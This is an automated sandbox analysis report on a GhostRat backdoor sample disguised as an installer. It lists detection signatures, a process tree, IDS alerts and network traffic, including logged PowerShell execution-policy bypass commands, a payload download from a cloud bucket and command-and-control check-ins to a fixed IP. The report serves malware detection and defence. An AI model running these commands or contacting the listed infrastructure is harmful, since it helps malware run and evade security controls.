Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wyySetups64.exe

Overview

General Information

Sample name:wyySetups64.exe
Analysis ID:1581895
MD5:97090426a42466d139d3e45f47c652f8
SHA1:c3500a1e6db48e87c2ba73bbb5ccc23ec31bbc2c
SHA256:e70179810f8c851e20966da1e5e1bb45dfc603c068864192c43eb161ce7abbd9
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

GhostRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Suricata IDS alerts for network traffic
Yara detected GhostRat
AI detected suspicious sample
Bypasses PowerShell execution policy
Checks if browser processes are running
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to infect the boot sector
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Queries disk data (e.g. SMART data)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • wyySetups64.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\wyySetups64.exe" MD5: 97090426A42466D139D3E45F47C652F8)
    • wyySetups64.exe (PID: 3624 cmdline: "C:\Users\user\AppData\Roaming\wyySetups64.exe" MD5: 97090426A42466D139D3E45F47C652F8)
      • cmd.exe (PID: 1136 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2008 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 6036 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3928 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • 360instpatch.exe (PID: 4460 cmdline: C:\Users\user\Downloads\360instpatch.exe MD5: AAA0F14BDFE3777EEE342C27DE409E6D)
  • 360instpatch.exe (PID: 3192 cmdline: C:\Users\user\Downloads\360instpatch.exe MD5: AAA0F14BDFE3777EEE342C27DE409E6D)
  • svchost.exe (PID: 3808 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: wyySetups64.exe PID: 3624JoeSecurity_GhostRatYara detected GhostRatJoe Security

    Sigma Signatures

    Sigma detected: Change PowerShell Policies to an Insecure Level
    Source: Process startedAuthor: frack113: Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 2008, ProcessName: powershell.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 2008, ProcessName: powershell.exe
    Sigma detected: Windows Processes Suspicious Parent Directory
    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3808, ProcessName: svchost.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-29T09:02:09.456478+010020528751A Network Trojan was detected192.168.2.449738118.107.44.21919091TCP
    2024-12-29T09:03:19.528655+010020528751A Network Trojan was detected192.168.2.449744118.107.44.21919091TCP
    2024-12-29T09:04:30.575700+010020528751A Network Trojan was detected192.168.2.449891118.107.44.21919092TCP
    2024-12-29T09:05:42.606786+010020528751A Network Trojan was detected192.168.2.450026118.107.44.21919091TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability

    Compliance

    barindex
    Detected unpacking (overwrites its own PE header)
    Source: C:\Users\user\Desktop\wyySetups64.exeUnpacked PE file: 0.2.wyySetups64.exe.400000.0.unpack
    Source: wyySetups64.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
    Source: unknownHTTPS traffic detected: 149.129.12.34:443 -> 192.168.2.4:49735 version: TLS 1.2
    Source: wyySetups64.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: \Release\Code_Shellcode.pdb source: wyySetups64.exe, wyySetups64.exe, 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\vmagent_new\bin\joblist\249110\out\Release\360P2SP.pdb source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.dr
    Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdbX source: 360instpatch.exe, 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmp, sites.dll.8.dr
    Source: Binary string: \Release\Code_Shellcode.pdb(!!GCTL source: wyySetups64.exe, 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\vmagent_new\bin\joblist\832091\out\Release\360Installer.pdb source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.dr
    Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdb source: 360instpatch.exe, 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmp, sites.dll.8.dr
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: z:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: x:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: v:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: t:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: r:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: p:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: n:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: l:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: j:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: h:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: f:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: b:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: y:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: w:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: u:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: s:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: q:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: o:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: m:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: k:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: i:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: g:Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: e:Jump to behavior
    Source: C:\Windows\System32\svchost.exeFile opened: c:
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile opened: [:Jump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B6D71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,8_2_00B6D71E
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B7D670 _memset,FindFirstFileW,FindNextFileW,FindClose,8_2_00B7D670
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B73FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,8_2_00B73FB0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF3A6BA _wcspbrk,__getdrive,FindFirstFileW,_wcspbrk,__wfullpath_helper,_wcslen,GetDriveTypeW,___loctotime64_t,__wsopen_s,__fstat64i32,__close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,8_2_6BF3A6BA
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CD3E2B7 FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,8_2_6CD3E2B7
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B7D670 _memset,FindFirstFileW,FindNextFileW,FindClose,9_2_00B7D670
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B6D71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,9_2_00B6D71E
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B73FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,9_2_00B73FB0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_033780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,1_2_033780F0

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49738 -> 118.107.44.219:19091
    Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49744 -> 118.107.44.219:19091
    Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49891 -> 118.107.44.219:19092
    Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:50026 -> 118.107.44.219:19091
    Connects to many ports of the same IP (likely port scanning)
    Source: global trafficTCP traffic: 118.107.44.219 ports 18852,8853,19092,19091,3,5,8
    Source: global trafficTCP traffic: 192.168.2.4:49733 -> 118.107.44.219:8853
    Source: global trafficUDP traffic: 192.168.2.4:23363 -> 1.192.136.170:3478
    Source: global trafficUDP traffic: 192.168.2.4:23363 -> 1.192.136.171:3478
    Source: global trafficUDP traffic: 192.168.2.4:23363 -> 8.46.123.189:15054
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=1&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=19&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=4187&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
    Source: Joe Sandbox ViewIP Address: 180.163.251.230 180.163.251.230
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=100&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=127&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=1&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=109&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=12&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=107&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=8&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /360safe/h_inst.cab?rd=36608336 HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)Host: pinst.360.cnConnection: CloseCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=10&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=129&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_10001BB0 InternetOpenA,InternetOpenUrlA,fopen,HttpQueryInfoW,SendMessageW,InternetReadFile,fwrite,SendMessageW,fclose,InternetCloseHandle,InternetCloseHandle,GetParent,ShowWindow,exit,0_2_10001BB0
    Source: global trafficHTTP traffic detected: GET /360instpatch.exe HTTP/1.1User-Agent: URLDownloaderHost: gwwifha84989.oss-ap-northeast-2.aliyuncs.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=100&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=127&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=1&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=109&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=12&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=1&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
